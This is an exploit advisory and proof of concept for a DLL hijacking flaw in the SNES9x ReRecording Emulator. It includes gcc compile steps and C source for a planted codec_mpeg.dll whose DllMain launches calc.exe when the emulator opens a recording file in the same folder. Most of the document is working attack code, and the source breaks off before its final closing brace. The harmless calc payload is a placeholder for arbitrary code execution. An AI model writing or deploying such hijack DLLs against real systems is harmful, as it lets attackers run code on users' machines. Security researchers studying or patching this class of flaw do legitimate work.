SNES9x ReRecording Emulator version 1.x.x suffers from a DLL hijacking vulnerability in codec_mpeg.dll.
945b33dd757b0e6ca21b6b7e518b606145f1374aca82fe60f91eb3410fb7e412
# Exploit Title: SNES9x ReRecording Emulator (codec_mpeg.dll) - DLL Hijacking Vulnerability
# Date: 7 Desember 2013
# Author: DevilScreaM
# Software Link: http://www.softpedia.com/dyn-postdownload.php?p=238598&t=4&i=1
# Version: 1.x.x
# Vendor : http://www.snes9x.com/
# Tested : Windows XP / Windows 7
# gcc -shared -o codec_mpeg.dll devilscream.c
# Compile devilscream.c and rar recording file and codec_mpeg.dll same folder. OpenWith SNES9x and Double-click Recording File. program start Calc.exe immediately.
#include <windows.h>
int newbiesecurity()
{
WinExec("calc", 0);
exit(0);
return 0;
}
BOOL WINAPI DllMain(HINSTANCE hinstDLL,DWORD fdwReason, LPVOID lpvReserved)
{
newbiesecurity();
return 0;